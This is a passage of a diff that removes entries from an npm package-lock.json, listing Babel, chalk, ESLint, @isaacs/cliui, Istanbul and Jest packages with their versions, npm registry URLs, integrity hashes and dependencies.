"node_modules/@babel/helper-module-transforms": { - "version": "7.23.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.23.3.tgz", - "integrity": "sha512-7bBs4ED9OmswdfDzpz4MpWgSrV7FXlc3zIagvLFjS5H+Mk7Snr21vQ6QwrsoCGMfNC4e4LQPdoULEt4ykz0SRQ==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-module-imports": "^7.22.15", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.20" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.24.0.tgz", - "integrity": "sha512-9cUznXMG0+FxRuJfvL82QlTqIzhVW9sL0KjMPHhAOOvpQGL8QtdxnBKILjBqxlHyliz0yCa1G903ZXI/FuHy2w==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.24.1.tgz", - "integrity": "sha512-2ofRCjnnA9y+wk8b9IAREroeUP02KHp431N2mhKniy2yKIDKpbrHv9eXwm8cBeWQYcJmzv5qKCu65P47eCF7CQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.23.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.23.5.tgz", - "integrity": "sha512-85ttAOMLsr53VgXkTbkx8oA6YTfT4q7/HzXSLEYmjcSTJPMPQtvq1BD79Byep5xMUYbGRzEpDsjUf3dyp54IKw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.24.4.tgz", - "integrity": "sha512-FewdlZbSiwaVGlgT1DPANDuCHaDMiOo+D/IDYRFYjHOuv66xMSJ7fQwwODwRNAPkADIO/z1EoF/l2BCWlWABDw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.24.2.tgz", - "integrity": "sha512-Yac1ao4flkTxTteCDZLEvdxg2fZfz1v8M4QpaGypq/WPDqg3ijHYbDfs+LG5hvzSoqaSZ9/Z9lKSP3CjZjv+pA==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha1-p9BVi9icQveV3UIyj3QIMcpTvCU=", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.24.4.tgz", - "integrity": "sha512-zTvEBcghmeBma9QIGunWevvBAp4/Qu9Bdq+2k0Ot4fVMD6v3dsC9WOcRSKk7tRRyBM/53yKMJko9xOatGQAwSg==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.24.1.tgz", - "integrity": "sha512-2eCtxZXf+kbkMIsXS4poTvT4Yu5rXiRa+9xGVT56raghjmBTKMpFNc9R4IDiB4emao9eO22Ox7CxuJG7BgExqA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.24.1.tgz", - "integrity": "sha512-Yhnmvy5HZEnHUty6i++gcfH1/l68AHnItFHnaCv6hn9dNh0hQvvQJsxpi4BMBFN5DLeHBuucT/0DgzXif/OyRw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.24.0.tgz", - "integrity": "sha512-Bkf2q8lMB0AFpX0NFEqSbx1OkTHf0f+0j82mkw+ZpzBnkk7e9Ql0891vlfgi+kHwOk8tQjiQHpqh4LaSa0fKEA==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.23.5", - "@babel/parser": "^7.24.0", - "@babel/types": "^7.24.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/template/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.24.1.tgz", - "integrity": "sha512-xuU6o9m68KeqZbQuDt2TcKSxUw/mrsvavlEqQ1leZ/B+C9tk6E4sRWy97WaXgvq5E+nU3cXMxv3WKOCanVMCmQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.24.1", - "@babel/generator": "^7.24.1", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.24.1", - "@babel/types": "^7.24.0", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse/node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/types": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.24.0.tgz", - "integrity": "sha512-+j7a5c253RfKh8iABBhywc8NSfP5LURe7Uh4qpsh6jc+aLJguvmIUBdjSdEMQv2bENrCR5MfRdjGo7vzS/ob7w==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.23.4", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@eslint/eslintrc": { - "version": "0.4.3", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-0.4.3.tgz", - "integrity": "sha512-J6KFFz5QCYUJq3pf0mjEcCJVERbzv71PUIDczuh9JkwGEzced6CO5ADLHB1rbf/+oPBtoPfMYNOpGDzCANlbXw==", - "dev": true, - "peer": true, - "dependencies": { - "ajv": "^6.12.4", - "debug": "^4.1.1", - "espree": "^7.3.0", - "globals": "^13.9.0", - "ignore": "^4.0.6", - "import-fresh": "^3.2.1", - "js-yaml": "^3.13.1", - "minimatch": "^3.0.4", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/@humanwhocodes/config-array": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.5.0.tgz", - "integrity": "sha512-FagtKFz74XrTl7y6HCzQpwDfXP0yhxe9lHLD1UZxjvZIcbyRz8zTFF/yYNfSfzU414eDwZ1SrO0Qvtyf+wFMQg==", - "dev": true, - "peer": true, - "dependencies": { - "@humanwhocodes/object-schema": "^1.2.0", - "debug": "^4.1.1", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=10.10.0" - } - }, - "node_modules/@humanwhocodes/object-schema": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.0.tgz", - "integrity": "sha512-wdppn25U8z/2yiaT6YGquE6X8sSv7hNMWSXYSSU1jGv/yd6XqjXgTDJ8KP4NgjTXfJ3GbRjeeb8RTV7a/VpM+w==", - "dev": true, - "peer": true - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-regex": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", - "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/@isaacs/cliui/node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@isaacs/cliui/node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": 